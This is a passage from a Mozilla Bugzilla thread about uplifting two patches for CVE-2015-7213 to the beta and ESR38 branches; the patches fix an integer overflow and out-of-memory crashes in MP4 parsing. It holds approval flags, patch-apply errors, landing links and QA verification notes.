[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high.
User impact if declined: Potential OOMs, crashes with bad MP4 files.
Fix Landed on Version: 44
Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts.
String or UUID changes made by this patch: None.
Flags: needinfo?(gsquelart)
Attachment #8694545 - Flags: approval-mozilla-esr38?
Gerald does this need uplift to beta as well? Which patches? Thanks.
Flags: needinfo?(gsquelart)
Comment on attachment 8694544 [details] [diff] [review]
Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch

Please uplift to beta, avoids crash from corrupt mp3 files.
Attachment #8694544 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment on attachment 8694545 [details] [diff] [review]
Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch

This should also uplift to beta to avoid OOM crashes from mpeg4.
Attachment #8694545 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Marking this as affected for 43 and accepting beta uplifts since I talked with Gerald on irc.
Flags: needinfo?(gsquelart)
Comment on attachment 8694545 [details] [diff] [review]
Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch

Re-setting esr flag for sylvestre to handle, as I meant to set the approval for beta!
Attachment #8694545 - Flags: approval-mozilla-esr38?
Attachment #8694545 - Flags: approval-mozilla-esr38+
Attachment #8694545 - Flags: approval-mozilla-beta+
Comment on attachment 8694544 [details] [diff] [review]
Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch

Fixing this to be an approval for beta, not esr.
Attachment #8694544 - Flags: approval-mozilla-esr38?
Attachment #8694544 - Flags: approval-mozilla-esr38+
Attachment #8694544 - Flags: approval-mozilla-beta+
this failed to apply to beta and aurora with:

adding 1206211-P1-beta.patch to series file
applying 1206211-P1-beta.patch
patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp
Hunk #1 FAILED at 502
1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej
patch failed, unable to continue (try -v)
patch failed, rejects left in working directory

could you take a look ?

Thanks!
Flags: needinfo?(jyavenard)
Working on it and bug 1216748.
Flags: needinfo?(jyavenard)
Attachment #8694544 - Flags: approval-mozilla-beta+
Attachment #8694545 - Flags: approval-mozilla-beta+
Comment on attachment 8665247 [details] [diff] [review]
P1. Ensure operation can't overflow.

(Requesting beta on the correct patches)
Attachment #8665247 - Flags: approval-mozilla-beta?
Comment on attachment 8665248 [details] [diff] [review]
P2. Abort on OOM.

(Requesting beta on the correct patches)
Attachment #8665248 - Flags: approval-mozilla-beta?
Comment on attachment 8665247 [details] [diff] [review]
P1. Ensure operation can't overflow.

Please uplift this patch to beta. My mistake!
Attachment #8665247 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Comment on attachment 8665248 [details] [diff] [review]
P2. Abort on OOM.

This should uplift to beta, I had the wrong patch in the last request.
Attachment #8665248 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
(In reply to Carsten Book [:Tomcat] from comment #38)
> this failed to apply to beta and aurora [...]

Beta should now work, with the correct patches.

But please don't try and uplift them to aurora, as they're already there.
Another ESR38 affected sec-high that hasn't been approved and checked in...
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Whiteboard: [adv-main43+]
Comment on attachment 8694545 [details] [diff] [review]
Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch

taking it too in esr.
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Attachment #8694545 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
failed to apply to esr:

patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp
Hunk #1 FAILED at 511
1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej
patch failed, unable to continue (try -v)
patch failed, rejects left in working directory
errors during apply, please fix and qrefresh 1206211.patch
Flags: needinfo?(jyavenard)
Sylvestre, you left Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch as "esr38?", could you please approve it? (Or is it implied by the approval of the 2nd patch?)

Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've tried locally and they just worked.
Flags: needinfo?(jyavenard) → needinfo?(sledru)
(In reply to Gerald Squelart [:gerald] from comment #49)
> Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've
> tried locally and they just worked.

Also, once these patches land, please check-in bug 1216748 patches (all those with esr38+). Thank you!
Please contact me if you're still having troubles.
Flags: needinfo?(cbook)
Comment on attachment 8694544 [details] [diff] [review]
Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch

This was a typo, sorry
Flags: needinfo?(sledru)
Attachment #8694544 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
(In reply to Gerald Squelart [:gerald] from comment #50)
> (In reply to Gerald Squelart [:gerald] from comment #49)
> > Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've
> > tried locally and they just worked.
> 
> Also, once these patches land, please check-in bug 1216748 patches (all
> those with esr38+). Thank you!
> Please contact me if you're still having troubles.

oh sorry missed that 2nd patch when i tried first but now with the 2nd patch and approval :) all is good and landed as

https://hg.mozilla.org/releases/mozilla-esr38/rev/f710e2e351b9
https://hg.mozilla.org/releases/mozilla-esr38/rev/75343b2f90f4
Flags: needinfo?(cbook)
Alias: CVE-2015-7213
Whiteboard: [adv-main43+] → [adv-main43+][adv-esr38.5+]
Reproduced this issue on Windows 10 x64 with Firefox 40 beta 8, using the attached poc.

Confirming the fix for:
*44 beta 9, build ID: 20160114165817
*43.0.3, build ID: 20151223140742
*latest 38.5.2esr tinderbox, build ID: 20160114062730
Status: RESOLVED → VERIFIED
QA Contact: cornel.ionce
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.